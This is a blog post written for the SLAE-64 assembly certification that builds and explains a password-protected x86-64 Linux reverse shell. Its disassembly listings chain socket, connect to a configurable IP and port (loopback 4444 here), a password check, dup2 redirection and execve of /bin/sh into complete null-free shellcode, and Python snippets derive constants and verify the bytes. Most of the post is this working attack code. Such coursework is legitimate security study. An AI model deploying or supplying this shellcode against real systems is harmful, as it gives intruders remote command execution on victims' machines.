Tags: assembly, slae-64, shellcode
This post is the second of seven that will comprise my attempt at the SecurityTube Linux Assembly Expert (SLAE-64) certification. Each post corresponds to one of seven assignments of varying difficulty. I decided to take SLAE-64 to shore up my knowledge of assembly and shellcoding before diving into OSCE.
The requirements for this assignment are almost identical to those of Assignment 1, so this post follows the same format. Also, because I’m a lazy programmer (in the good way), I will be reusing certain sections of code from the first assignment.
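If you took a look at my first assignment, you know that it takes quite a few steps to create a bind shell. Thankfully, a reverse shell is much simpler. The steps, each covered in a section below, are: create a socket, connect it to the remote IP address and port, check the password, duplicate the socket onto stdin, stdout, and stderr, and execute a shell.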
For testing, I used loopback as my IP address and port 4444. We can fire up Python again to help us prep these values for use in the assembly. If you’re unfamiliar with socket programming, the function name inet_pton may sound a bit cryptic, but I’ll take this opportunity to quote the venerable Beej on the subject of inet_pton and inet_ntop:
These functions (pton and ntop) are for dealing with human-readable IP addresses and converting them to their binary representation for use with various functions and system calls. The “n” stands for “network”, and “p” for “presentation”. Or “text presentation”. But you can think of it as “printable”. “ntop” is “network to printable”.
- Beej
The name htons stands for host to network short. Host to network conversion is very similar to what’s happening with the pton function. We convert from host byte order to network byte order because a little-endian machine (Intel, to name one) has to flip multi-byte values into network byte order (big-endian) before they go on the wire. Basically, a choice had to be made about the order in which bytes traverse networks. The choice was big-endian, so little-endian systems have to flip things around before sending data on its way. Endianness is an interesting topic (especially the origin of the term), but a more thorough explanation is beyond the scope of this post.
>>> import socket
>>> hex(socket.htons(4444))
'0x5c11'
>>> socket.inet_pton(socket.AF_INET, '127.1')[::-1]
'\x01\x7f'
After we’ve prepped the values, they can be defined at the top of the assembly so we can easily swap them to something different later on.
%define PORTNUMBER 0x5c11
%define IPADDR 0x017f
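If you want to re-derive constants like these for a different port or address, the sketch below is one way to do it. The helper names port_immediate and addr_immediate are my own inventions for illustration, not part of any library. It packs the value in network byte order and then reads it back as a little-endian integer, which is the form an x86-64 immediate needs. Unlike socket.htons, this gives the same answer regardless of the endianness of the machine running Python.

```python
import socket
import struct

def port_immediate(port):
    """Return the 16-bit immediate that, stored by a little-endian CPU,
    leaves the port in network byte order in memory."""
    wire = struct.pack("!H", port)          # bytes as they appear in sin_port
    return struct.unpack("<H", wire)[0]     # same bytes read as a little-endian word

def addr_immediate(dotted):
    """Return the 32-bit immediate for a dotted-quad IPv4 address."""
    wire = socket.inet_aton(dotted)         # 4 bytes in network byte order
    return struct.unpack("<I", wire)[0]

print(hex(port_immediate(4444)))            # 0x5c11
print(hex(addr_immediate("127.0.0.1")))     # 0x100007f
```

Note that the full 32-bit immediate for 127.0.0.1 contains two zero bytes, which is the reason for reaching for a shorter, null-free value in the assembly.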
Once again, we start by creating a socket using the socket() syscall. This should look very similar to what was covered in the first assignment. One thing that changed between my first post and this one: I found that mov reg, reg encodes to one more byte than push reg; pop reg (for example, mov rdi,rax is 3 bytes while push rax; pop rdi is 2). Once I complete the other assignments, I plan to revisit the earlier ones and apply the things I pick up along the way, such as this.
#define __NR_socket 41
int socket(int domain, int type, int protocol);
/*
* rax -> 41 -> socket syscall
* rdi -> 2 (AF_INET) -> domain
* rsi -> 1 (SOCK_STREAM) -> type
* rdx -> 0 -> protocol
*/
Original shellcode: 25 bytes
0000000000400080 <_start>:
400080: b8 29 00 00 00 mov eax,0x29
400085: bf 02 00 00 00 mov edi,0x2
40008a: be 01 00 00 00 mov esi,0x1
40008f: ba 00 00 00 00 mov edx,0x0
400094: 0f 05 syscall
400096: 48 89 c7 mov rdi,rax
My shellcode: 15 bytes
0000000000400080 <_start>:
400080: 6a 29 push 0x29
400082: 58 pop rax
400083: 6a 02 push 0x2
400085: 5f pop rdi
400086: 6a 01 push 0x1
400088: 5e pop rsi
400089: 31 d2 xor edx,edx
40008b: 0f 05 syscall
; copy socket descriptor to rdi for future use
40008d: 50 push rax
40008e: 5f pop rdi
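To make the size difference between the two listings above concrete, here is a small sketch that counts bytes and nulls for a few of the encodings, copied straight from the objdump output. The helper size_and_nulls is a hypothetical name of mine.

```python
def size_and_nulls(hex_bytes):
    """Return (length, null_count) for a space-separated hex dump."""
    raw = bytes.fromhex(hex_bytes)
    return len(raw), raw.count(0)

# Copying one register to another
mov_copy = size_and_nulls("48 89 c7")            # mov rdi,rax
push_pop_copy = size_and_nulls("50 5f")          # push rax; pop rdi

# Loading a small constant
mov_imm = size_and_nulls("b8 29 00 00 00")       # mov eax,0x29
push_pop_imm = size_and_nulls("6a 29 58")        # push 0x29; pop rax

print(mov_copy, push_pop_copy)   # (3, 0) (2, 0)
print(mov_imm, push_pop_imm)     # (5, 3) (3, 0)
```

The push/pop form wins on both counts for small constants: it is shorter, and it avoids the three zero bytes that a 32-bit immediate drags along.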
To write the reverse shell, the socket needs to know about the IP and port to which we want to connect back. The sockaddr_in struct holds that information and is built using the stack since it’s too large to fit in a single register.
struct sockaddr_in {
sa_family_t sin_family; /* address family: AF_INET */
in_port_t sin_port; /* port in network byte order */
struct in_addr sin_addr; /* internet address */
};
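You may have noticed that I used 127.1 as my loopback IP. This allowed me to write a loopback address onto the stack without any nulls in the instruction bytes. Strictly speaking, the two bytes 0x7f 0x01 stored at the start of a zeroed sin_addr spell 127.1.0.0 rather than 127.0.0.1, but on Linux the whole 127.0.0.0/8 block is routed to the loopback interface, so a listener bound to all interfaces still receives the connection. There are other valid ways of representing IPv4 addresses, such as a single 32-bit integer: for example, ping 2130706433 (0x7f000001) pings 127.0.0.1.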
Original shellcode: 45 bytes
400099: 48 31 c0 xor rax,rax
40009c: 50 push rax
40009d: c7 44 24 fc 7f 00 00 mov DWORD PTR [rsp-0x4],0x100007f
4000a4: 01
4000a5: 66 c7 44 24 fa 11 5c mov WORD PTR [rsp-0x6],0x5c11
4000ac: 66 c7 44 24 f8 02 00 mov WORD PTR [rsp-0x8],0x2
4000b3: 48 83 ec 08 sub rsp,0x8
4000bc: 48 89 e6 mov rsi,rsp
My shellcode: 23 bytes
000000000040008f <populate_sockaddr_in>:
; assumption: rax contains result of socket syscall, use it to
; zero out rdx via sign extension (cdq)
40008f: 99 cdq
400090: 52 push rdx
400091: 52 push rdx
400092: 66 c7 44 24 04 7f 01 mov WORD PTR [rsp+0x4],0x17f
400099: 66 c7 44 24 02 11 5c mov WORD PTR [rsp+0x2],0x5c11
4000a0: c6 04 24 02 mov BYTE PTR [rsp],0x2
4000a4: 54 push rsp
4000a5: 5e pop rsi
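To double-check what those three stores leave in memory, the sketch below replays them on a 16-byte zeroed buffer (standing in for the two push rdx instructions) and then decodes the result as a sockaddr_in. It is a simulation in Python under that assumption, not a trace of the real process.

```python
import socket
import struct

# Two `push rdx` with rdx == 0 leave 16 zero bytes at [rsp].
sockaddr = bytearray(16)

struct.pack_into("<H", sockaddr, 4, 0x017F)  # mov WORD PTR [rsp+0x4],0x17f
struct.pack_into("<H", sockaddr, 2, 0x5C11)  # mov WORD PTR [rsp+0x2],0x5c11
struct.pack_into("<B", sockaddr, 0, 0x02)    # mov BYTE PTR [rsp],0x2

family = struct.unpack_from("<H", sockaddr, 0)[0]  # sin_family, host order on x86-64
port = struct.unpack_from("!H", sockaddr, 2)[0]    # sin_port, network order
address = socket.inet_ntoa(bytes(sockaddr[4:8]))   # sin_addr, network order

print(sockaddr.hex())          # 0200115c7f0100000000000000000000
print(family, port, address)   # 2 4444 127.1.0.0
```

The decoded address is 127.1.0.0, which still sits inside 127.0.0.0/8 and so still reaches the local machine on Linux.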
The connect() system call connects the socket referred to by the file descriptor sockfd to the address specified by addr.
#define __NR_connect 42
int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
/* rax -> 42
* rdi -> already contains server socket fd
* rsi -> already contains pointer to sockaddr_in with IP:PORT
* rdx -> length of sockaddr_in (16)
*/
Original shellcode: 12 bytes
4000b7: b8 2a 00 00 00 mov eax,0x2a
4000bf: ba 10 00 00 00 mov edx,0x10
4000c4: 0f 05 syscall
My shellcode: 8 bytes
00000000004000a6 <connect_call>:
4000a6: 6a 2a push 0x2a
4000a8: 58 pop rax
4000a9: 6a 10 push 0x10
4000ab: 5a pop rdx
4000ac: 0f 05 syscall
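For comparison, this is roughly what the socket() and connect() pair looks like from a high-level language. It is only a sketch: connect_back is a hypothetical helper name, and the throwaway listener on an OS-chosen loopback port exists just so the example has something to connect to.

```python
import socket

def connect_back(host, port):
    """socket() followed by connect(): the first two steps of the reverse shell."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
    sock.connect((host, port))
    return sock

# Throwaway listener so the demo is self-contained (port 0 = let the OS pick).
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.bind(("127.0.0.1", 0))
listener.listen(1)
port = listener.getsockname()[1]

client = connect_back("127.0.0.1", port)
peer, _ = listener.accept()
client.sendall(b"hello\n")
received = peer.recv(16)

for s in (client, peer, listener):
    s.close()
```

Python builds the sockaddr_in and passes its length for you, which is exactly the work the assembly has to do by hand with rsi and rdx.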
The next few sections are almost identical to my post for the first assignment. If you’d like a more in-depth analysis of the following snippets of code, please head there and take a look. The only real difference between them is that I started using push reg; pop reg instead of mov reg, reg. That difference makes these snippets a few bytes shorter in some cases, but for the most part they’re the same.
#define __NR_read 0
ssize_t read(int fd, void *buf, size_t count);
/* rax -> 0
* rdi -> client already stored in rdi
* rsi -> 24 bytes allocated should be good
* rdx -> 24
*/
My shellcode: 36 bytes
00000000004000ae <read_call>:
4000ae: 31 c0 xor eax,eax
4000b0: 48 83 ec 18 sub rsp,0x18 ; allocate space on the stack
4000b4: 54 push rsp
4000b5: 5e pop rsi
4000b6: 6a 18 push 0x18
4000b8: 5a pop rdx
4000b9: 0f 05 syscall ; <-- user input stored rsi
00000000004000bb <compare>:
4000bb: 57 push rdi
4000bc: 41 59 pop r9 ; save server socket
4000be: 48 b8 6c 65 74 6d 65 movabs rax,0xa6e69656d74656c ; letmein\n
4000c5: 69 6e 0a
4000c8: 48 8d 3e lea rdi,[rsi]
4000cb: 48 af scas rax,QWORD PTR es:[rdi]
4000cd: 41 51 push r9
4000cf: 5f pop rdi ; restore server socket
; if password isn't right, close the server socket
4000d0: 75 2e jne 400100 <close_call>
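The comparison is easier to reason about in a high-level form. The sketch below mimics what scas does here: it compares the 8-byte value in rax against the first 8 bytes of the buffer and nothing more. password_matches is a hypothetical name, and the zero-filled 24-byte buffer is an assumption; the real stack buffer is not cleared, so it may hold leftover data past whatever read() wrote.

```python
import struct

PASSWORD_QWORD = 0x0A6E69656D74656C   # immediate loaded by movabs

def password_matches(user_input):
    """Mimic scas rax,[rdi]: compare rax with the first qword of the buffer."""
    buf = bytearray(24)                    # assumption: zeroed 24-byte buffer
    data = user_input[:24]                 # read() is asked for at most 24 bytes
    buf[:len(data)] = data
    first_qword = struct.unpack_from("<Q", buf, 0)[0]
    return first_qword == PASSWORD_QWORD

print(struct.pack("<Q", PASSWORD_QWORD))       # b'letmein\n'
print(password_matches(b"letmein\n"))          # True
print(password_matches(b"letmein"))            # False (no trailing newline)
print(password_matches(b"letmein\nanything"))  # True (only 8 bytes are checked)
```

One consequence of checking a single qword is that any input beginning with letmein followed by a newline passes, whatever comes after it.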
Just like the bind shell, now we need to duplicate the file descriptors.
#define __NR_dup2 33
int dup2(int oldfd, int newfd);
/* rax -> 33
* rdi -> server socket
* rsi -> 2 -> 1 -> 0 (3 iterations)
*/
Original shellcode: 36 bytes
4000c6: b8 21 00 00 00 mov eax,0x21
4000cb: be 00 00 00 00 mov esi,0x0
4000d0: 0f 05 syscall
4000d2: b8 21 00 00 00 mov eax,0x21
4000d7: be 01 00 00 00 mov esi,0x1
4000dc: 0f 05 syscall
4000de: b8 21 00 00 00 mov eax,0x21
4000e3: be 02 00 00 00 mov esi,0x2
4000e8: 0f 05 syscall
My shellcode: 20 bytes
00000000004000d2 <dup2_calls>:
4000d2: 6a 03 push 0x3
4000d4: 59 pop rcx ; loop counter
4000d5: 6a 02 push 0x2
4000d7: 5b pop rbx ; used as file descriptor
00000000004000d8 <dup2_loop>:
4000d8: 6a 21 push 0x21
4000da: 58 pop rax
4000db: 89 de mov esi,ebx ; 2 -> 1 -> 0
4000dd: 51 push rcx ; store loop counter
4000de: 0f 05 syscall
4000e0: 59 pop rcx ; restore loop counter
4000e1: 48 ff cb dec rbx
4000e4: e2 f2 loop 4000d8 <dup2_loop>
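The loop is short but has two moving counters, so here is a sketch that replays it in Python and records which dup2 calls it would issue. dup2_plan is a hypothetical name and nothing is actually duplicated. The push rcx and pop rcx around the syscall are there because the syscall instruction itself overwrites rcx (with the return address), which would otherwise destroy the loop counter.

```python
def dup2_plan(sock_fd):
    """Return the (rax, rdi, rsi) triples the dup2 loop passes to syscall."""
    calls = []
    rcx = 3                  # push 0x3; pop rcx -> loop counter
    rbx = 2                  # push 0x2; pop rbx -> newfd, counts down
    while True:
        calls.append((33, sock_fd, rbx))   # rax=0x21 (dup2), rdi=socket, rsi=rbx
        rbx -= 1                           # dec rbx
        rcx -= 1                           # `loop` decrements rcx ...
        if rcx == 0:                       # ... and falls through at zero
            break
    return calls

print(dup2_plan(3))   # [(33, 3, 2), (33, 3, 1), (33, 3, 0)]
```

After the third call, stderr, stdout, and stdin all refer to the socket, in that order.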
Finally, it’s time to execve() our shell. Once again, the only appreciable difference between this snippet and the corresponding section from the first assignment is the method used to move data between two registers. Also included here is the label that marks where to jump when the user provides an incorrect password.
#define __NR_execve 59
int execve(const char *filename, char *const argv[], char *const envp[]);
/* rax -> 59
* rdi -> "/bin//sh", 0x0
* rsi -> [addr of /bin//sh], 0x0
* rdx -> 0x0
*/
#define __NR_close 3
int close(int fd);
/* rax -> 3
* rdi -> fd already stored in rdi
*/
Original shellcode: 32 bytes
4000ea: 48 31 c0 xor rax,rax
4000ed: 50 push rax
4000ee: 48 bb 2f 62 69 6e 2f movabs rbx,0x68732f2f6e69622f
4000f5: 2f 73 68
4000f8: 53 push rbx
4000f9: 48 89 e7 mov rdi,rsp
4000fc: 50 push rax
4000fd: 48 89 e2 mov rdx,rsp
400100: 57 push rdi
400101: 48 89 e6 mov rsi,rsp
400104: 48 83 c0 3b add rax,0x3b
400108: 0f 05 syscall
My shellcode: 31 bytes
00000000004000e6 <exec_call>:
4000e6: 31 d2 xor edx,edx
4000e8: 52 push rdx
4000e9: 48 bb 2f 62 69 6e 2f movabs rbx,0x68732f2f6e69622f
4000f0: 2f 73 68
4000f3: 53 push rbx
4000f4: 54 push rsp
4000f5: 5f pop rdi
4000f6: 52 push rdx
4000f7: 57 push rdi
4000f8: 54 push rsp
4000f9: 5e pop rsi
4000fa: 48 8d 42 3b lea rax,[rdx+0x3b]
4000fe: 0f 05 syscall
0000000000400100 <close_call>:
400100: 6a 03 push 0x3
400102: 58 pop rax
400103: 0f 05 syscall
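The sequence of pushes in exec_call builds both the path string and the argv array on the stack. The sketch below replays those pushes on a fake stack to show where rdi and rsi end up pointing. The starting address and the name build_execve_stack are made up for illustration.

```python
import struct

def build_execve_stack(top=0x7FFF0000):
    """Replay the pushes from exec_call; return (memory, rdi, rsi)."""
    memory = {}
    rsp = top

    def push(value):
        nonlocal rsp
        rsp -= 8
        memory[rsp] = struct.pack("<Q", value)

    push(0)                      # push rdx -> NUL terminator for the path
    push(0x68732F2F6E69622F)     # push rbx -> "/bin//sh"
    rdi = rsp                    # push rsp; pop rdi -> filename
    push(0)                      # push rdx -> argv[1] = NULL
    push(rdi)                    # push rdi -> argv[0] = pointer to the path
    rsi = rsp                    # push rsp; pop rsi -> argv
    return memory, rdi, rsi

memory, rdi, rsi = build_execve_stack()
path = (memory[rdi] + memory[rdi + 8]).split(b"\x00")[0]
argv0 = struct.unpack("<Q", memory[rsi])[0]
argv1 = struct.unpack("<Q", memory[rsi + 8])[0]

print(path)                  # b'/bin//sh'
print(argv0 == rdi, argv1)   # True 0
```

The doubled slash pads the path to exactly eight bytes so it fits one register without a null, and the kernel treats it the same as a single slash.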
Here we have a functional password-protected reverse shell. There are no nulls in the code and, even after adding authentication, my shellcode ended up a tad smaller than the original (barely).
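The no-nulls claim is easy to verify mechanically. The sketch below concatenates the bytes from each of the "My shellcode" listings above (transcribed by hand from the objdump output, so treat the transcription as the assumption here) and checks the total length and the absence of zero bytes.

```python
# Bytes copied from the "My shellcode" listings, one entry per stage.
stages = {
    "socket":   "6a 29 58 6a 02 5f 6a 01 5e 31 d2 0f 05 50 5f",
    "sockaddr": "99 52 52 66 c7 44 24 04 7f 01 66 c7 44 24 02 11 5c c6 04 24 02 54 5e",
    "connect":  "6a 2a 58 6a 10 5a 0f 05",
    "read":     "31 c0 48 83 ec 18 54 5e 6a 18 5a 0f 05",
    "compare":  "57 41 59 48 b8 6c 65 74 6d 65 69 6e 0a 48 8d 3e 48 af 41 51 5f 75 2e",
    "dup2":     "6a 03 59 6a 02 5b 6a 21 58 89 de 51 0f 05 59 48 ff cb e2 f2",
    "execve":   "31 d2 52 48 bb 2f 62 69 6e 2f 2f 73 68 53 54 5f 52 57 54 5e 48 8d 42 3b 0f 05",
    "close":    "6a 03 58 0f 05",
}

shellcode = b"".join(bytes.fromhex(h) for h in stages.values())
sizes = {name: len(bytes.fromhex(h)) for name, h in stages.items()}

print(sizes)
print(len(shellcode), b"\x00" in shellcode)   # 133 False
```

The total of 133 bytes matches the address range of the listings, which run from 0x400080 to 0x400105.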
I’m looking forward to the egghunter assignment that is coming up next!
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert
Student ID: E64-1584
My SLAE-64 Assignments Repository